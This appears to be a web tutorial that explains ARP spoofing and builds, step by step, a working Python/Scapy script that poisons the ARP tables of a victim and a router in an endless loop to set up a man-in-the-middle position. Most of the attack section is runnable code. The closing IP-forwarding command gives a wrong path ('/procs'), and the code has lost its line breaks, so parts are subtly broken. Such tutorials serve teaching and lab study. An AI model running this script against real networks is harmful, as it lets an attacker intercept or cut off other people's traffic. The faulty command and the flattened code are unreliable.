In this article, we are going to discuss the ARP Spoofing attack using Python programming. Before going deep into the code first let’s understand some basic topics of what is ARP Spoofing and what it does.
ARP Spoofing:
The ARP spoofing is the technique to fool a computer or a device which accepts the ARP response packets even though the device does not request it. As the device accepts the response packet without its knowledge, we can easily mess up with the hack and the hacker takes the advantage of this by sending a modified ARP response packet which contains the modified MAC address of the client with the hacker’s IP address to the router to fool and then simultaneously send the same ARP response packet to the victim saying that I am router. To achieve this attack the hacker sends an ARP response packet to the victim saying that “I am the router with the MAC address (hacker machine address) “and at the same time the hacker sends the same ARP response packet to the router saying that “I am the victim with this MAC address (hacker machine MAC address). Due to ARP request the victim and router will modify their network tables with the respective MAC address provided by the hacker. This can be easily understood by the below figure.
How to make an ARP Spoofing attack using Scapy in Python
Note: Here the attacks are performed under a virtual environment (virtual box) with the Linux operating system as the hacker machine, Windows 10 as the victim machine and our home router as a router. This attack only works when all the devices are in the same network. Here, we are using a NAT network to create this attack.
Step 1: To implement this code in Python we are going to use a package called scapy. First, we are going to create an ARP packet using the scapy package. Here, we are not creating an ARP request, but instead, we are creating an ARP response packet. So, we are going to let us know what fields we need to set in order to make the ARP packet as a response packet in Python as follows. In scapy the ARP packet is created using the syntax as shown below.
Python3
import scapy. all as scapy scapy.ARP() # To list the fields in ARP() print (scapy.ls(scapy.ARP())) |
Output:
Step 2: Now let’s understand the code by first getting the MAC address of the device with its IP address with the below code. First, we are using the above-mentioned scapy module to generate an ARP packet to the given IP address.
Python3
# creating an ARP request to the ip address arp_request = scapy.ARP(pdst = ip) |
Then create a broadcast message with a MAC address to broadcast MAC that is “ff:ff:ff:ff:ff:ff” as shown below.
Python3
# setting the denstination MAC address to broadcast MAC address broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff" ) |
Then we combine the broadcast packet with the ARP request.
Python3
# combining the ARP packet with the broadcast message arp_request_broadcast = broadcast / arp_request |
Then sent to the victim’s IP address and to do so we use scapy.srp() as shown below.
Python3
answ = scapy.srp(arp_request_broadcast, timeout = 1 , verbose = False )[ 0 ] |
Step 3: Now let’s combine the MAC address statements above-mentioned with in a function and then you them with our while loop to continuously fool the devices.
Python3
#!/usr/bin/env python import time import sys import scapy. all as scapy # MAC address function which will return # the mac_address of the provided ip address def get_mac(ip): # creating an ARP request to the ip address arp_request = scapy.ARP(pdst = ip) # setting the denstination MAC address to broadcast MAC broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff" ) # combining the ARP packet with the broadcast message arp_request_broadcast = broadcast / arp_request # return a list of MAC addresses with respective # MAC addresses and IP addresses. answ = scapy.srp(arp_request_broadcast, timeout = 1 , verbose = False )[ 0 ] # we choose the first MAC address and select # the MAC address using the field hwsrc return answ[ 0 ][ 1 ].hwsrc def arp_spoof(target_ip, spoof_ip): """" Here the ARP packet is set to response and pdst is set to the target IP either it is for victim or router and the hwdst is the MAC address of the IP provided and the psrc is the spoofing ip address to manipulate the packet""" packet = scapy.ARP(op = 2 , pdst = target_ip, hwdst = get_mac(target_ip), psrc = spoof_ip) scapy.send(packet, verbose = False ) victim_ip = input () # taking the victim ip_address router_ip = input () # taking the router ip address sent_packets_count = 0 # initializing the packet counter while True : sent_packets_count + = 2 arp_spoof(victim_ip, router_ip) arp_spoof(router_ip, victim_ip) print ( "[+] Packets sent " + str (sent_packets_count), end = "\r" ) sys.stdout.flush() time.sleep( 2 ) |
Output:
After implementing the program the victim does not get the internet connection because the packets are forwarded to the hacker’s machine and in order to allow the flow of packets we need to run a command in a Linux shell as below.
echo 1 > /procs/sys/net/ipv4/ip_forward
The victim ARP table is shown below: